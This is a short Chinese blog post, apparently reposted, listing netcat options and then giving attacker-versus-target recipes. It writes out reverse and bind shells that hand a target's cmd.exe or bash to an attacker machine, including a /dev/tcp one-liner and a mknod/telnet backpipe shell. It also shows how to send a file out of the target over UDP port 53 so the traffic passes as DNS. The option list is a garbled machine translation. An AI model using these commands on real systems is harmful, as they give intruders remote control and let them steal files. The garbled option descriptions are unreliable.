netcat的用法
连接到某处:nc [-options] hostname port[s] [ports] ...
侦听入站:nc -l -p port [-options] [hostname] [port]
options:
-d 分离形式控制台后台模式
-c,--close从标准输入的EOF密切联系
-e,--exec = PROGRAM程序后,exec的连接
-g,--gateway = LIST源路由跳点[S],多达8个
-G,--pointer = NUM源路由指针:4,8,12,...
-h,--help显示帮助并退出
对于线发送-i,--interval = SECS延迟间隔,端口扫描
-l,--listen监听模式,用于入站连接
-L,--tunnel =地址:端口转发本地端口远程地址
-n,--dont,解决纯数字IP地址,不DNS
-o,--output = FILE输出hexdump都通信,以文件(-x暗示)
-p,--local端口= NUM本地端口号
-r,--randomize随机本地和远程端口
-s,--source =地址本地源地址(IP或主机名)
-t,--tcp TCP模式(默认)
-T,使用Telnet协商--telnet回答
-u,--udp UDP模式
-v,--verbose冗长(使用两次,更详细)
-V,--version输出版本信息并退出
-x,--hexdump hexdump都传入和传出流量
-w,--wait = SECS超时连接和最后读网
-z,--zero零I / O模式(用于扫描)
攻击机建立服务器等目标机送CMD
攻击机:kali
nc -l -p 3333
目标机:XP
nc -d 攻击机IP -e -cmd.exe
目标机建立服务器等攻击机去联
目标机:
nc -d -l -p 3333 -e cmd.exe
攻击机:
nc 目标机IP 3333
netcat传文件(先要攻击机建立服务端收取)UDP53号端口是DNS
目标机:nc -u 192.168.1.105 53 < 123.txt
这里192.168.1.105是攻击机的
攻击机:
nc -u -l -p 53 > 456.txt
以及
目标机器:nc -v -w 30 -p 3333 -l < 123.txt(-w是延迟,超过30秒断开,-l进入监听)
攻击机器:nc -v -w 3 192.168.1.108 3333 > 456.txt(192.168.1.108为目标机)
linux建立服务送shell给windows
攻击机:nc -l -n -vv -p 8080
目标机器:/bin/bash -i > /dev/tcp/192.168.1.108/8080 0<&1 2>&1
mknod backpipe p && telnet 192.168.1.108 8080 0<backpipe | /bin/bash 1>backpipe
本文出自 “网络安全爱好者” 博客,请务必保留此出处http://blackflag.blog.51cto.com/9679269/1641266
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。